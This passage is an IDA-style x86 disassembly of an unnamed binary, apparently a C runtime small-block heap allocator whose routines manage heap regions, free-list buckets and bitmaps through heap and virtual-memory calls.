lea esi, ds:42CB88h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_416927
push eax
call sub_416882
test eax, eax
pop ecx
jnz short loc_416927
push 11h
call sub_4148E1
pop ecx
loc_416927: ; CODE XREF: sub_416901+11�j
; sub_416901+1C�j
push dword ptr [esi]
call ds:dword_41F01C
pop esi
pop ebp
retn
sub_416901 endp
; =============== S U B R O U T I N E =======================================
sub_416932 proc near ; CODE XREF: sub_41677E+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_47A63C
call ds:dword_41F13C
test eax, eax
mov dword_47A628, eax
jnz short loc_41694F
retn
; ---------------------------------------------------------------------------
loc_41694F: ; CODE XREF: sub_416932+1A�j
mov ecx, [esp+arg_0]
and dword_47A620, 0
and dword_47A624, 0
mov dword_47A630, eax
xor eax, eax
mov dword_47A62C, ecx
mov dword_47A634, 10h
inc eax
retn
sub_416932 endp
; =============== S U B R O U T I N E =======================================
sub_41697A proc near ; CODE XREF: sub_412FE4+29�p
; sub_41318A+5B�p ...
arg_0 = dword ptr 4
mov eax, dword_47A624
lea ecx, [eax+eax*4]
mov eax, dword_47A628
lea ecx, [eax+ecx*4]
jmp short loc_41699E
; ---------------------------------------------------------------------------
loc_41698C: ; CODE XREF: sub_41697A+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_4169A4
add eax, 14h
loc_41699E: ; CODE XREF: sub_41697A+10�j
cmp eax, ecx
jb short loc_41698C
xor eax, eax
locret_4169A4: ; CODE XREF: sub_41697A+1F�j
retn
sub_41697A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4169A5 proc near ; CODE XREF: sub_412FE4+38�p
; sub_41318A+B8�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_416CB9
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_416A70
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_416A08
push 3Fh
pop edx
loc_416A08: ; CODE XREF: sub_4169A5+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_416A52
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_416A33
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_416A4F
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_416A4F
; ---------------------------------------------------------------------------
loc_416A33: ; CODE XREF: sub_4169A5+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_416A4F
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_416A4F: ; CODE XREF: sub_4169A5+85�j
; sub_4169A5+8C�j ...
mov ebx, [ebp+arg_4]
loc_416A52: ; CODE XREF: sub_4169A5+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_416A70: ; CODE XREF: sub_4169A5+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_416A7E
push 3Fh
pop edx
loc_416A7E: ; CODE XREF: sub_4169A5+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_416B1C
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_416AA3
mov ebx, esi
loc_416AA3: ; CODE XREF: sub_4169A5+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_416AB5
mov edx, esi
loc_416AB5: ; CODE XREF: sub_4169A5+10C�j
cmp ebx, edx
jz short loc_416B17
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_416AFF
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_416AE5
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_416AFF
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_416AFF
; ---------------------------------------------------------------------------
loc_416AE5: ; CODE XREF: sub_4169A5+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_416AFF
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_416AFF: ; CODE XREF: sub_4169A5+11D�j
; sub_4169A5+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_416B17: ; CODE XREF: sub_4169A5+112�j
mov esi, [ebp+arg_4]
jmp short loc_416B1F
; ---------------------------------------------------------------------------
loc_416B1C: ; CODE XREF: sub_4169A5+E2�j
mov ebx, [ebp+arg_0]
loc_416B1F: ; CODE XREF: sub_4169A5+175�j
cmp [ebp+var_C], 0
jnz short loc_416B2D
cmp ebx, edx
jz loc_416BAD
loc_416B2D: ; CODE XREF: sub_4169A5+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_416BAD
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_416B84
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_416B73
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_416B73: ; CODE XREF: sub_4169A5+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_416BAD
; ---------------------------------------------------------------------------
loc_416B84: ; CODE XREF: sub_4169A5+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_416B9A
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_416B9A: ; CODE XREF: sub_4169A5+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_416BAD: ; CODE XREF: sub_4169A5+182�j
; sub_4169A5+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_416CB8
mov eax, dword_47A620
test eax, eax
jz loc_416CAA
mov ecx, dword_47A638
mov esi, ds:dword_41F170
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi
mov ecx, dword_47A638
mov eax, dword_47A620
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_47A620
mov eax, [eax+10h]
mov ecx, dword_47A638
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_47A620
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_47A620
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_416C3B
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_47A620
loc_416C3B: ; CODE XREF: sub_4169A5+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_416CAA
push ebx
push 0
push dword ptr [eax+0Ch]
call esi
mov eax, dword_47A620
push dword ptr [eax+10h]
push 0
push dword_47A63C
call ds:dword_41F134
mov eax, dword_47A624
mov edx, dword_47A628
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_47A620
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_41BC70
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_47A624
cmp eax, dword_47A620
jbe short loc_416CA0
sub [ebp+arg_0], 14h
loc_416CA0: ; CODE XREF: sub_4169A5+2F5�j
mov eax, dword_47A628
mov dword_47A630, eax
loc_416CAA: ; CODE XREF: sub_4169A5+223�j
; sub_4169A5+29A�j
mov eax, [ebp+arg_0]
mov dword_47A620, eax
mov dword_47A638, edi
loc_416CB8: ; CODE XREF: sub_4169A5+216�j
pop ebx
loc_416CB9: ; CODE XREF: sub_4169A5+37�j
pop edi
pop esi
leave
retn
sub_4169A5 endp
; =============== S U B R O U T I N E =======================================
sub_416CBD proc near ; CODE XREF: sub_417159+150�p
mov eax, dword_47A624
mov ecx, dword_47A634
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_416D03
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_47A628
push edi
push dword_47A63C
call ds:dword_41F138
cmp eax, edi
jnz short loc_416CF2
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_416CF2: ; CODE XREF: sub_416CBD+2F�j
add dword_47A634, 10h
mov dword_47A628, eax
mov eax, dword_47A624
loc_416D03: ; CODE XREF: sub_416CBD+10�j
mov ecx, dword_47A628
push esi
push 41C4h
push 8
push dword_47A63C
lea eax, [eax+eax*4]
lea esi, [ecx+eax*4]
call ds:dword_41F13C
cmp eax, edi
mov [esi+10h], eax
jnz short loc_416D2E
loc_416D2A: ; CODE XREF: sub_416CBD+9B�j
xor eax, eax
jmp short loc_416D71
; ---------------------------------------------------------------------------
loc_416D2E: ; CODE XREF: sub_416CBD+6B�j
push 4
push 2000h
push 100000h
push edi
call ds:dword_41F174
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_416D5A
push dword ptr [esi+10h]
push edi
push dword_47A63C
call ds:dword_41F134
jmp short loc_416D2A
; ---------------------------------------------------------------------------
loc_416D5A: ; CODE XREF: sub_416CBD+89�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_47A624
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_416D71: ; CODE XREF: sub_416CBD+6F�j
pop esi
pop edi
retn
sub_416CBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D74 proc near ; CODE XREF: sub_417159+15F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_416D8C
; ---------------------------------------------------------------------------
loc_416D89: ; CODE XREF: sub_416D74+1A�j
shl eax, 1
inc ebx
loc_416D8C: ; CODE XREF: sub_416D74+13�j
test eax, eax
jge short loc_416D89
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_416DA5: ; CODE XREF: sub_416D74+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_416DA5
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call ds:dword_41F174
test eax, eax
jnz short loc_416DD8
or eax, 0FFFFFFFFh
jmp loc_416E75
; ---------------------------------------------------------------------------
loc_416DD8: ; CODE XREF: sub_416D74+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_416E28
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_416DF0: ; CODE XREF: sub_416D74+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_416DF0
mov edx, [ebp+var_4]
loc_416E28: ; CODE XREF: sub_416D74+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_416E65
or [eax+4], edi
loc_416E65: ; CODE XREF: sub_416D74+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_416E75: ; CODE XREF: sub_416D74+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_416D74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E7A proc near ; CODE XREF: sub_41318A+77�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_41701C
test bl, 1
jnz loc_417015
add ebx, ecx
cmp esi, ebx
jg loc_417015
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_416EEF
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_416EEF: ; CODE XREF: sub_416E7A+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_416F3A
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_416F1B
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_416F3A
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_416F3A
; ---------------------------------------------------------------------------
loc_416F1B: ; CODE XREF: sub_416E7A+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_416F3A
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_416F3A: ; CODE XREF: sub_416E7A+7B�j
; sub_416E7A+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_417003
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_416F74
push 3Fh
pop edi
loc_416F74: ; CODE XREF: sub_416E7A+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_416FF1
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_416FC8
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_416FC0
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_416FC0: ; CODE XREF: sub_416E7A+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_416FE8
; ---------------------------------------------------------------------------
loc_416FC8: ; CODE XREF: sub_416E7A+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_416FDE
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_416FDE: ; CODE XREF: sub_416E7A+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_416FE8: ; CODE XREF: sub_416E7A+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_416FF1: ; CODE XREF: sub_416E7A+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_417006
; ---------------------------------------------------------------------------
loc_417003: ; CODE XREF: sub_416E7A+DE�j
mov edx, [ebp+arg_4]
loc_417006: ; CODE XREF: sub_416E7A+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_417151
; ---------------------------------------------------------------------------
loc_417015: ; CODE XREF: sub_416E7A+50�j
; sub_416E7A+5A�j
xor eax, eax
jmp loc_417154
; ---------------------------------------------------------------------------
loc_41701C: ; CODE XREF: sub_416E7A+47�j
jge loc_417151
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_417047
push 3Fh
pop esi
loc_417047: ; CODE XREF: sub_416E7A+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_4170D1
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_417060
push 3Fh
pop esi
loc_417060: ; CODE XREF: sub_416E7A+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_4170AA
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_41708B
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_4170A7
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4170A7
; ---------------------------------------------------------------------------
loc_41708B: ; CODE XREF: sub_416E7A+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4170A7
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4170A7: ; CODE XREF: sub_416E7A+208�j
; sub_416E7A+20F�j ...
mov ebx, [ebp+arg_4]
loc_4170AA: ; CODE XREF: sub_416E7A+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_4170D1
push 3Fh
pop esi
loc_4170D1: ; CODE XREF: sub_416E7A+1D1�j
; sub_416E7A+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_417148
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_41711F
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_417117
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_417117: ; CODE XREF: sub_416E7A+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_41713F
; ---------------------------------------------------------------------------
loc_41711F: ; CODE XREF: sub_416E7A+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_417135
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_417135: ; CODE XREF: sub_416E7A+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_41713F: ; CODE XREF: sub_416E7A+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_417148: ; CODE XREF: sub_416E7A+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_417151: ; CODE XREF: sub_416E7A+196�j
; sub_416E7A:loc_41701C�j
xor eax, eax
inc eax
loc_417154: ; CODE XREF: sub_416E7A+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_416E7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417159 proc near ; CODE XREF: sub_41318A+89�p
; sub_4133A6+2D�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov ecx, [ebp+arg_0]
mov eax, dword_47A624
mov edx, dword_47A628
add ecx, 17h
and ecx, 0FFFFFFF0h
push ebx
mov [ebp+var_10], ecx
sar ecx, 4
push esi
lea eax, [eax+eax*4]
push edi
dec ecx
cmp ecx, 20h
lea edi, [edx+eax*4]
mov [ebp+var_4], edi
jge short loc_417196
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_4171A3
; ---------------------------------------------------------------------------
loc_417196: ; CODE XREF: sub_417159+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_8], eax
loc_4171A3: ; CODE XREF: sub_417159+3B�j
mov eax, dword_47A630
mov ebx, eax
mov [ebp+var_C], esi
cmp ebx, edi
jmp short loc_4171C5
; ---------------------------------------------------------------------------
loc_4171B1: ; CODE XREF: sub_417159+6F�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4171CA
add ebx, 14h
cmp ebx, [ebp+var_4]
loc_4171C5: ; CODE XREF: sub_417159+56�j
mov [ebp+arg_0], ebx
jb short loc_4171B1
loc_4171CA: ; CODE XREF: sub_417159+64�j
cmp ebx, [ebp+var_4]
jnz short loc_4171F3
mov ebx, edx
jmp short loc_4171E4
; ---------------------------------------------------------------------------
loc_4171D3: ; CODE XREF: sub_417159+90�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4171EB
add ebx, 14h
loc_4171E4: ; CODE XREF: sub_417159+78�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_4171D3
loc_4171EB: ; CODE XREF: sub_417159+86�j
cmp ebx, eax
jz loc_417287
loc_4171F3: ; CODE XREF: sub_417159+74�j
; sub_417159+170�j
mov dword_47A630, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_41721A
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_417250
loc_41721A: ; CODE XREF: sub_417159+AB�j
mov edx, [eax+0C4h]
and edx, [ebp+var_8]
and [ebp+var_4], 0
lea ecx, [eax+44h]
mov esi, [ecx]
and esi, [ebp+var_C]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_41724D
loc_417236: ; CODE XREF: sub_417159+F2�j
mov edx, [ecx+84h]
and edx, [ebp+var_8]
inc [ebp+var_4]
add ecx, 4
mov edi, [ecx]
and edi, esi
or edx, edi
jz short loc_417236
loc_41724D: ; CODE XREF: sub_417159+DB�j
mov edx, [ebp+var_4]
loc_417250: ; CODE XREF: sub_417159+BF�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_4172D9
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_4172D9
; ---------------------------------------------------------------------------
loc_41727B: ; CODE XREF: sub_417159+131�j
cmp dword ptr [ebx+8], 0
jnz short loc_41728C
add ebx, 14h
mov [ebp+arg_0], ebx
loc_417287: ; CODE XREF: sub_417159+94�j
cmp ebx, [ebp+var_4]
jb short loc_41727B
loc_41728C: ; CODE XREF: sub_417159+126�j
cmp ebx, [ebp+var_4]
jnz short loc_4172B7
mov ebx, edx
jmp short loc_41729E
; ---------------------------------------------------------------------------
loc_417295: ; CODE XREF: sub_417159+14A�j
cmp dword ptr [ebx+8], 0
jnz short loc_4172A5
add ebx, 14h
loc_41729E: ; CODE XREF: sub_417159+13A�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_417295
loc_4172A5: ; CODE XREF: sub_417159+140�j
cmp ebx, eax
jnz short loc_4172B7
call sub_416CBD
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_4172CF
loc_4172B7: ; CODE XREF: sub_417159+136�j
; sub_417159+14E�j
push ebx
call sub_416D74
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz loc_4171F3
loc_4172CF: ; CODE XREF: sub_417159+15C�j
xor eax, eax
jmp loc_417450
; ---------------------------------------------------------------------------
loc_4172D6: ; CODE XREF: sub_417159+182�j
shl ecx, 1
inc edi
loc_4172D9: ; CODE XREF: sub_417159+111�j
; sub_417159+120�j
test ecx, ecx
jge short loc_4172D6
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_4172FA
push 3Fh
pop esi
loc_4172FA: ; CODE XREF: sub_417159+19C�j
cmp esi, edi
jz loc_417403
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_417366
cmp edi, 20h
mov ebx, 80000000h
jge short loc_41733A
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_417363
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_417366
; ---------------------------------------------------------------------------
loc_41733A: ; CODE XREF: sub_417159+1B9�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_417363
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_417366
; ---------------------------------------------------------------------------
loc_417363: ; CODE XREF: sub_417159+1D5�j
; sub_417159+1FD�j
mov ebx, [ebp+arg_0]
loc_417366: ; CODE XREF: sub_417159+1AF�j
; sub_417159+1DF�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_41740F
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_417400
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_4173D7
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_4173C5
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_4173C5: ; CODE XREF: sub_417159+25F�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_417400
; ---------------------------------------------------------------------------
